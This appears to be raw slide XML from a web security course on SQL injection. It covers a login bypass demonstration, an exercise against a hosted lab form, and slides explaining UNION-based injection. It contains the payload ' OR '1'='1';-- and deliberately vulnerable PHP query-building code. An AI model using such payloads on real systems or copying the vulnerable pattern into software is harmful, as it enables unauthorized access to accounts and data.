                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’ OR ’1’=‘1’;-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="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AND password=‘$password’;”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’1’=‘1’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="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mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is always true, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>always retrieves data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>always logs you in!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5EF6E15-877E-49C0-B26F-B190FB70744F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594252" y="3182921"/>
            <a:ext cx="6939720" cy="1200329"/>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$name = $_POST[“name”];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$password = $_POST[“password”];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$query = “SELECT * FROM users WHERE name=‘$name’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	   AND password=‘$password’;”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304396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756479-28D7-4681-8C83-8AA60ED4DCB4}"/>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928E86-365C-4CF4-B700-AFE986FFA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190500" y="2890391"/>
            <a:ext cx="8763000" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note that the injected comment symbol causes the DB to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E04006"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>skip the password check!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1299429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rgbClr val="F8B041"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Login Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Demonstration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1081857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dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this exercise, you’ll inject an OR clause to bypass a login form. You’ll use the same technique demonstrated in lecture, but you’ll need to find out which type of quote to use first…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1"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Load the vulnerable form at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://ptl-b1464393-cabeb391.libcurl.so/login.php</a:t>
            </a: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Refer to the scenario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endParaRPr lang="en-US"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Login Bypasses (20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19616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SQL Warm-Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2009508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Login Bypass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402005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391401" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In-Band SQL Injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2536892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03688-DD48-4BB7-97A9-6A3F639FB8B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-30126" y="4271903"/>
            <a:ext cx="9174126" cy="21288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104D85-AC1D-4548-9BE8-025FA8D4B937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="154477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2219FF7-6D2E-4593-BDC2-535E6AFCCD18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="381000"/>
            <a:ext cx="6088142" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anatomy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3598DB"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD7645AD-8FA4-4A49-80A7-9C195D3F36D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="451879" y="1671697"/>
            <a:ext cx="7298235" cy="3046988"/>
            <a:chOff x="451879" y="2590800"/>
            <a:chExt cx="7298235" cy="3046988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="TextBox 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A439884-3E63-468A-822E-8483A880D7C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3121924" y="2590800"/>
              <a:ext cx="4628190" cy="3046988"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>SELECT first, last</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>FROM users</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>UNION</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>SELECT age, title</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>FROM employees;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="32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122B58BA-FC9F-44F8-9625-12C1E3B18260}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2667000"/>
              <a:ext cx="2343527"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LEFT QUERY</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF656D0F-0CD9-4E5C-9655-14617D1ACED3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="451879" y="3662303"/>
              <a:ext cx="1330814"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UNION</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20" name="Table 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C2B1A6-5A4A-4953-83ED-5C4789F9CE41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2934839334"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3352800" y="4572000"/>
          <a:ext cx="3253610" cy="1598365"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1626805">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1140279928"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1626805">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3612358718"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="527901">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>First Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Last Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2501053273"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="535232">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Jane</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Doe</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3018436078"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="535232">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>23</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sr Director</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="80238" marR="80238" marT="40119" marB="40119" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1602689102"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E06A24C-0F4A-49D2-84E7-771780709261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451879" y="5100935"/>
            <a:ext cx="2238113" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RETRIEVES:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBA3D031-A3BE-46E2-8283-FEA7A21A77EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3276600"/>
            <a:ext cx="2582374"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RIGHT QUERY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3656901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03688-DD48-4BB7-97A9-6A3F639FB8B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-30126" y="4271903"/>
            <a:ext cx="9174126" cy="21288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104D85-AC1D-4548-9BE8-025FA8D4B937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="154477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2219FF7-6D2E-4593-BDC2-535E6AFCCD18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="381000"/>
            <a:ext cx="7177671" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacking with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3598DB"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD7645AD-8FA4-4A49-80A7-9C195D3F36D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="451879" y="1671697"/>
            <a:ext cx="7298235" cy="3046988"/>
            <a:chOff x="451879" y="2590800"/>
            <a:chExt cx="7298235" cy="3046988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="TextBox 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A439884-3E63-468A-822E-8483A880D7C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3121924" y="2590800"/>
              <a:ext cx="4628190" cy="3046988"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>SELECT first, last</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
